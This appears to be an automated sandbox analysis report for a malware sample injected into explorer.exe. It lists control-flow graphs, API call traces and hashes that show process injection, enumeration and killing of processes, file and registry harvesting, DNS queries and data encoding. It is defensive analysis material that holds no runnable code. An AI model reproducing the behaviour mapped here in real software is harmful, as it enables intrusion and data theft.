                                                                                                                                                                                                                              control_flow_graph 184 1e30a8-1e30e3 call 1e2688 call 1e272c 189 1e30ec-1e3111 call 1e2688 FindFirstFileW 184->189 190 1e30e5-1e30e6 184->190 193 1e3237-1e3252 call 1e1860 * 2 189->193 194 1e3117-1e3118 189->194 190->189 195 1e311f-1e3124 194->195 198 1e31ad-1e31df call 1e2688 call 1e2700 195->198 199 1e312a-1e313e 195->199 214 1e3208-1e320b call 1e1860 198->214 215 1e31e1-1e31eb call 1e2af8 198->215 206 1e3144-1e3158 199->206 207 1e3210-1e3220 FindNextFileW 199->207 206->207 211 1e315e-1e316b call 1e272c 206->211 207->195 209 1e3226-1e3230 FindClose 207->209 209->193 219 1e316d-1e3174 211->219 220 1e3176 211->220 214->207 215->214 223 1e31ed-1e3203 call 1e2f7c 215->223 222 1e3178-1e31a8 call 1e2688 call 1e2700 call 1e30a8 call 1e1860 219->222 220->222 222->198 223->214
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3541575487-0
                                                                                                                                                                                                                              • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                                                                                                              • Instruction ID: 7e47975b61a7cdd1c0013ac771e2757fdb7d3f2fdfc493a2b86083234fd29001
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F418030718F8D5FDB94EB3A84587AE73D6FBE8340F444A29A45AC3151EF78D9048781

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 239 1e38b0-1e3907 call 1e1ad4 call 1e1838 NtUnmapViewOfSection call 1e388c 248 1e3909-1e390c call 1e38b0 239->248 249 1e3911-1e391a 239->249 248->249
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL ref: 001E38F2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: SectionUnmapView
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 498011366-0
                                                                                                                                                                                                                              • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                                                                                                              • Instruction ID: 097cb51da8669ee2c2db714b2f796e990a5433aa2dc2a752fd1d42f68c8a3b9f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EF0A720F11D481BEA6C77BE645D33C2280E768314F900629B525C32D2DE398E458302

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE ref: 001E27C7
                                                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE ref: 001E27F4
                                                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE ref: 001E283A
                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE ref: 001E2860
                                                                                                                                                                                                                                • Part of subcall function 001E1860: RtlFreeHeap.NTDLL ref: 001E1880
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: QueryValue$CloseFreeHeapOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1641618270-0
                                                                                                                                                                                                                              • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                                                                                                              • Instruction ID: ccf7bf041aebf3b63dcfbc5c72128ed16b3404c9f41d604935d90650377ff595
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F319430608F888FE768DB29D458B7E77D4FBA8355F54062EE48BC2264DF34C8458742

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 22 1e372c-1e37ba call 1e1838 RegCreateKeyExW 26 1e37bc-1e37cb RegCloseKey 22->26 27 1e37d6-1e37f0 call 1e1860 22->27 26->27 28 1e37cd-1e37d3 26->28 28->27
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreate
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 2932200918-1684325040
                                                                                                                                                                                                                              • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                                                                                                              • Instruction ID: f089e2d98142ede5eb315fd1690139ebe127f6ba6b762c6ccf46c37e5fa554f9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7116070618B488FD751DF69D48C66EB7E1FB98345F50062EE48AC3260DF389985CB82

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 31 1ea298-1ea29b 32 1ea2a5-1ea2a9 31->32 33 1ea2ab-1ea2b3 32->33 34 1ea2b5 32->34 33->34 35 1ea29d-1ea2a3 34->35 36 1ea2b7 34->36 35->32 37 1ea2ba-1ea2c1 36->37 39 1ea2cd 37->39 40 1ea2c3-1ea2cb 37->40 39->37 41 1ea2cf-1ea2d2 39->41 40->39 42 1ea2e7-1ea2f4 41->42 43 1ea2d4-1ea2e2 41->43 53 1ea30e-1ea31c call 1ea25a 42->53 54 1ea2f6-1ea2f8 42->54 44 1ea31e-1ea339 43->44 45 1ea2e4-1ea2e5 43->45 46 1ea36a-1ea36d 44->46 45->42 48 1ea36f-1ea370 46->48 49 1ea372-1ea379 46->49 51 1ea351-1ea355 48->51 52 1ea37f-1ea383 49->52 55 1ea33b-1ea33e 51->55 56 1ea357-1ea35a 51->56 57 1ea385-1ea39e LoadLibraryA 52->57 58 1ea3e0-1ea3e9 52->58 53->32 59 1ea2fb-1ea302 54->59 55->49 64 1ea340 55->64 56->49 60 1ea35c-1ea360 56->60 63 1ea39f-1ea3a6 57->63 61 1ea3ec-1ea3f5 58->61 79 1ea30c 59->79 80 1ea304-1ea30a 59->80 65 1ea362-1ea369 60->65 66 1ea341-1ea345 60->66 67 1ea41a-1ea46a VirtualProtect * 2 61->67 68 1ea3f7-1ea3f9 61->68 63->52 70 1ea3a8 63->70 64->66 65->46 66->51 77 1ea347-1ea349 66->77 74 1ea46e-1ea473 67->74 72 1ea40c-1ea418 68->72 73 1ea3fb-1ea40a 68->73 75 1ea3aa-1ea3b2 70->75 76 1ea3b4-1ea3bc 70->76 72->73 73->61 74->74 81 1ea475-1ea484 74->81 82 1ea3be-1ea3ca 75->82 76->82 77->51 78 1ea34b-1ea34f 77->78 78->51 78->56 79->53 79->59 80->79 85 1ea3cc-1ea3d3 82->85 86 1ea3d5-1ea3df 82->86 85->63
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE ref: 001EA397
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 001EA441
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE ref: 001EA45F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000012.00000002.2390934990.00000000001E9000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E9000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1e9000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 895956442-0
                                                                                                                                                                                                                              • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                                                                                                              • Instruction ID: 9ec2f8ce0216b8ce876207e465434105fb62cdccd59290ba9fec98635038bf8e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4517B31358D9E4BCB24AB799CC42FDB7C1FF55321B98062AD09AC3285D759E8468383

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 87 1e3254-1e3287 call 1e298c 90 1e328d-1e3297 call 1e298c 87->90 91 1e343a-1e3456 87->91 90->91 94 1e329d-1e32aa call 1e272c 90->94 97 1e32ac-1e32b3 94->97 98 1e32b5 94->98 99 1e32b7-1e32c2 call 1e2688 97->99 98->99 102 1e342c-1e3435 call 1e30a8 99->102 103 1e32c8-1e32fe call 1e2688 call 1e1838 * 2 call 1e2938 99->103 102->91 113 1e340c-1e3427 call 1e1860 * 4 103->113 114 1e3304-1e3318 GetPrivateProfileSectionNamesW 103->114 113->102 114->113 116 1e331e-1e3326 114->116 116->113 118 1e332c-1e332f 116->118 118->113 120 1e3335-1e3348 118->120 124 1e334e-1e3377 GetPrivateProfileStringW 120->124 125 1e33f0-1e3406 120->125 124->125 127 1e3379-1e3398 GetPrivateProfileIntW 124->127 125->113 125->118 130 1e339a-1e33ad call 1e2688 127->130 131 1e33e5-1e33eb call 1e30a8 127->131 135 1e33af-1e33b3 130->135 136 1e33c6-1e33e3 call 1e30a8 call 1e1860 130->136 131->125 137 1e33bd-1e33c4 135->137 138 1e33b5-1e33ba 135->138 136->125 137->135 137->136 138->137
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 001E298C: GetFileAttributesW.KERNELBASE ref: 001E299E
                                                                                                                                                                                                                              • GetPrivateProfileSectionNamesW.KERNEL32 ref: 001E330F
                                                                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32 ref: 001E336F
                                                                                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32 ref: 001E338C
                                                                                                                                                                                                                                • Part of subcall function 001E30A8: FindFirstFileW.KERNELBASE ref: 001E3104
                                                                                                                                                                                                                                • Part of subcall function 001E1860: RtlFreeHeap.NTDLL ref: 001E1880
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 970345848-0
                                                                                                                                                                                                                              • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                                                                                                              • Instruction ID: 7311922a059f97f7a4b3431bbe8e4cd9b284c5daf37c2bb3fe16d7037008dca9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA51C830718F494BDB1DBB2E981AA7D72D2FBA8700B44056DE41AC3296EF74DD428786

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • StrStrIW.KERNELBASE ref: 001E347E
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE ref: 001E353F
                                                                                                                                                                                                                              • RegEnumKeyExW.KERNELBASE ref: 001E35D6
                                                                                                                                                                                                                                • Part of subcall function 001E2774: RegOpenKeyExW.KERNELBASE ref: 001E27C7
                                                                                                                                                                                                                                • Part of subcall function 001E2774: RegQueryValueExW.KERNELBASE ref: 001E27F4
                                                                                                                                                                                                                                • Part of subcall function 001E2774: RegQueryValueExW.KERNELBASE ref: 001E283A
                                                                                                                                                                                                                                • Part of subcall function 001E2774: RegCloseKey.KERNELBASE ref: 001E2860
                                                                                                                                                                                                                                • Part of subcall function 001E3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 001E330F
                                                                                                                                                                                                                                • Part of subcall function 001E1860: RtlFreeHeap.NTDLL ref: 001E1880
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1841478724-0
                                                                                                                                                                                                                              • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                                                                                                              • Instruction ID: 563a5e5acd0395f07f9f49efccd7507d184cd1d12abf12055bbe3dcb3c317550
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6414C30718F884FDB98EF6E945972EB6E2FBA8341F00456EA54EC3261DF34D9448742

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 232 1e2938-1e2943 233 1e2984 232->233 234 1e2945-1e2948 232->234 236 1e2986-1e298b 233->236 234->233 235 1e294a-1e2970 CreateFileW 234->235 237 1e2972-1e297a CloseHandle 235->237 238 1e2980-1e2982 235->238 237->238 238->236
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3498533004-0
                                                                                                                                                                                                                              • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                                                                                                              • Instruction ID: 0782f6848884301e6f3135cb8e30d9a03e81f8059faf96c5c6db465300b886d6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79F0E570215B5A8FE7486FBA44A833AF6D4FB08319F18563DE45AC22D0DBB488428702

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 251 1e22b4-1e22c6 252 1e22c8-1e22d0 CreateStreamOnHGlobal 251->252 253 1e22d6-1e22e6 251->253 252->253
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateStreamOnHGlobal.COMBASE ref: 001E22D0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateGlobalStream
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2244384528-0
                                                                                                                                                                                                                              • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                                                                                                              • Instruction ID: e36a36fabed1c78a5d0f2300c896c03cee840663c113124d103ceaa8d6268cba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3E0C230108B0A8FD758AFBDE4CA07933A1FB9C252B05053FE005CB114D27988C1C741

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 254 1e298c-1e2997 255 1e2999-1e299c 254->255 256 1e29b5 254->256 255->256 257 1e299e-1e29a7 GetFileAttributesW 255->257 258 1e29b7-1e29bc 256->258 259 1e29a9-1e29af 257->259 260 1e29b1-1e29b3 257->260 259->260 260->258
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE ref: 001E299E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                                                                                                              • Instruction ID: 6664e7b65eec73d1dff12e81d190144499bac52ed11817e51c0ec2b9aa29e084
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FD0A522711D95077B5425F708FD1793058D71931DF541335D937C11E1D3A5CCD59205

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 261 1e1860-1e1870 call 1e1ad4 264 1e1886-1e188b 261->264 265 1e1872-1e1880 RtlFreeHeap 261->265 265->264
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000012.00000002.2390934990.00000000001E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001E1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1e1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                              • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                                                                                                              • Instruction ID: 81ccf7552b99934a6a44b0d0945b6b8b217d0a13740ae8bcd668d91e151af865
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3D01234716E441BEF2CBBFB2C8D178BAD2E7A8216B588065B819C3251DE39C895C342

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:14.4%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:96.2%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:211
                                                                                                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                                                                                                              execution_graph 905 669cf6 907 669caf 905->907 906 669f00 VirtualProtect VirtualProtect 908 669ec9 906->908 907->905 907->906 907->908 833 662917 lstrlenW WideCharToMultiByte 675 669d24 677 669caf 675->677 676 669f00 VirtualProtect VirtualProtect 678 669ec9 676->678 677->676 677->678 806 661e44 807 661e5b lstrlen CharLowerBuffA 806->807 813 661ec7 806->813 808 661e9d 807->808 810 661e75 807->810 808->813 815 661ece StrStrIA 808->815 809 661e7f lstrcmpiA 809->810 809->813 810->808 810->809 814 662692 lstrlen RtlMoveMemory 814->813 816 661ef5 RtlMoveMemory RtlMoveMemory StrStrIA 815->816 817 661eb3 815->817 816->817 818 661f37 StrStrIA 816->818 817->813 817->814 818->817 819 661f4a StrStrIA 818->819 819->817 820 661f5d lstrlen 819->820 820->817 821 661f6a 820->821 821->817 822 661f9b lstrlen 821->822 822->817 822->821 909 6618f4 CreateFileW 910 66196d 909->910 911 661919 GetFileSize 909->911 912 661965 CloseHandle 911->912 913 661929 911->913 912->910 913->912 919 6629b7 GetProcessHeap RtlAllocateHeap 913->919 915 661936 ReadFile 918 66194b 915->918 916 662999 3 API calls 917 661964 916->917 917->912 918->916 919->915 834 662013 835 662036 834->835 836 662029 lstrlen 834->836 845 6629b7 GetProcessHeap RtlAllocateHeap 835->845 836->835 838 66203e lstrcat 839 662073 lstrcat 838->839 840 66207a 838->840 839->840 846 6620a7 840->846 843 662999 3 API calls 844 66209d 843->844 845->838 880 662415 846->880 850 6620d4 885 662938 lstrlen MultiByteToWideChar 850->885 852 6620e3 886 6624cc RtlZeroMemory 852->886 855 662135 RtlZeroMemory 857 66216a 855->857 856 662999 3 API calls 858 66208a 856->858 861 6623f7 857->861 863 662198 857->863 888 66243d 857->888 858->843 860 6623dd 860->861 862 662999 3 API calls 860->862 861->856 862->861 863->860 897 6629b7 GetProcessHeap RtlAllocateHeap 863->897 865 662268 wsprintfW 866 66228e 865->866 870 6622fb 866->870 898 6629b7 GetProcessHeap RtlAllocateHeap 866->898 868 6622c8 wsprintfW 868->870 869 6623ba 871 662999 3 API calls 869->871 870->869 899 6629b7 GetProcessHeap RtlAllocateHeap 870->899 873 6623ce 871->873 873->860 874 662999 3 API calls 873->874 874->860 875 6623b3 877 662999 3 API calls 875->877 876 662346 876->875 900 66296b VirtualAlloc 876->900 877->869 879 6623a0 RtlMoveMemory 879->875 881 66241f 880->881 883 6620c6 880->883 901 662818 lstrlen lstrlen 881->901 884 6629b7 GetProcessHeap RtlAllocateHeap 883->884 884->850 885->852 887 6620f3 886->887 887->855 887->861 889 6624ab 888->889 891 66244a 888->891 889->863 890 66244e DnsQuery_W 890->891 891->889 891->890 892 66248d DnsFree inet_ntoa 891->892 892->891 893 6624ad 892->893 903 6629b7 GetProcessHeap RtlAllocateHeap 893->903 895 6624b7 904 662938 lstrlen MultiByteToWideChar 895->904 897->865 898->868 899->876 900->879 902 662839 901->902 902->883 903->895 904->889 679 661000 680 661007 679->680 681 661010 679->681 683 661016 680->683 691 6627e2 VirtualQuery 683->691 686 661022 686->681 688 66102e RtlMoveMemory NtUnmapViewOfSection 694 66104f 688->694 692 66101e 691->692 692->686 693 6629b7 GetProcessHeap RtlAllocateHeap 692->693 693->688 733 6629b7 GetProcessHeap RtlAllocateHeap 694->733 696 66105c 734 6629b7 GetProcessHeap RtlAllocateHeap 696->734 698 66106b ExpandEnvironmentStringsW 699 661085 698->699 700 66108c ExpandEnvironmentStringsW 698->700 735 66123a 699->735 702 6610a0 ExpandEnvironmentStringsW 700->702 703 661099 700->703 705 6610b4 SHGetSpecialFolderPathW 702->705 706 6610ad 702->706 704 66123a 24 API calls 703->704 704->702 707 6610c5 705->707 708 6610cc ExpandEnvironmentStringsW 705->708 709 66123a 24 API calls 706->709 710 66123a 24 API calls 707->710 711 6610e0 ExpandEnvironmentStringsW 708->711 712 6610d9 708->712 709->705 710->708 714 6610f4 ExpandEnvironmentStringsW 711->714 715 6610ed 711->715 742 6611cc 712->742 717 661101 714->717 718 661108 ExpandEnvironmentStringsW 714->718 757 661192 715->757 719 661192 16 API calls 717->719 720 661115 718->720 721 66111c ExpandEnvironmentStringsW 718->721 719->718 722 661192 16 API calls 720->722 723 661130 721->723 724 661129 721->724 722->721 764 662999 723->764 725 661192 16 API calls 724->725 725->723 728 661187 ExitProcess 730 66114e 731 66117f 730->731 732 661158 wsprintfA 730->732 731->728 732->731 732->732 733->696 734->698 770 66274a CreateToolhelp32Snapshot 735->770 740 66255c 16 API calls 741 661268 740->741 741->700 743 66255c 16 API calls 742->743 744 6611e6 743->744 745 66255c 16 API calls 744->745 746 6611f3 745->746 747 66255c 16 API calls 746->747 748 661200 747->748 749 66255c 16 API calls 748->749 750 66120d 749->750 751 66255c 16 API calls 750->751 752 66121a 751->752 753 66255c 16 API calls 752->753 754 661227 753->754 755 66255c 16 API calls 754->755 756 661234 755->756 756->711 758 66255c 16 API calls 757->758 759 6611ac 758->759 760 66255c 16 API calls 759->760 761 6611b9 760->761 762 66255c 16 API calls 761->762 763 6611c6 762->763 763->714 765 6627e2 VirtualQuery 764->765 766 6629a1 765->766 767 661137 766->767 768 6629a5 GetProcessHeap HeapFree 766->768 767->728 769 6629b7 GetProcessHeap RtlAllocateHeap 767->769 768->767 769->730 771 662765 Process32First 770->771 772 661249 770->772 773 6627ae 771->773 779 66255c 772->779 774 6627b2 CloseHandle 773->774 775 66277f lstrcmpiA 773->775 774->772 776 662795 775->776 777 6627a0 Process32Next 775->777 794 6627be OpenProcess 776->794 777->773 797 6629b7 GetProcessHeap RtlAllocateHeap 779->797 781 66257a lstrcatW PathAppendW 782 6625a2 FindFirstFileW 781->782 783 66265d 781->783 782->783 791 6625b9 782->791 784 662999 3 API calls 783->784 786 66125b 784->786 785 6625bd RtlZeroMemory 785->791 786->740 787 66263e FindNextFileW 787->785 790 662652 FindClose 787->790 788 66260f lstrcatW PathAppendW 788->787 789 662627 StrStrIW 788->789 789->787 789->791 790->783 791->785 791->787 791->788 792 6625df lstrcatW PathAppendW 791->792 793 66255c 5 API calls 791->793 792->787 792->791 793->791 795 6627e0 794->795 796 6627d0 TerminateProcess CloseHandle 794->796 795->777 796->795 797->781 824 661e3e 825 661e5b lstrlen CharLowerBuffA 824->825 831 661ec7 824->831 826 661e75 825->826 828 661e9d 825->828 827 661e7f lstrcmpiA 826->827 826->828 827->826 827->831 829 661ece 8 API calls 828->829 828->831 830 661eb3 829->830 830->831 832 662692 lstrlen RtlMoveMemory 830->832 832->831 798 66118f 799 661192 798->799 800 66255c 16 API calls 799->800 801 6611ac 800->801 802 66255c 16 API calls 801->802 803 6611b9 802->803 804 66255c 16 API calls 803->804 805 6611c6 804->805 823 66295c VirtualFree 920 6626ac lstrlen 921 6626c4 CryptBinaryToStringA 920->921 922 6626f3 920->922 921->922 923 6626d7 921->923 926 6629b7 GetProcessHeap RtlAllocateHeap 923->926 925 6626e2 CryptBinaryToStringA 925->922 926->925

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 006629B7: GetProcessHeap.KERNEL32(00000008,00000412,0066257A,006618F4), ref: 006629BA
                                                                                                                                                                                                                                • Part of subcall function 006629B7: RtlAllocateHeap.NTDLL(00000000), ref: 006629C1
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,?,006618F4), ref: 00662588
                                                                                                                                                                                                                              • PathAppendW.SHLWAPI(00000000,*.*,?,006618F4), ref: 00662594
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,?,006618F4), ref: 006625A8
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(00000209,00000209), ref: 006625C3
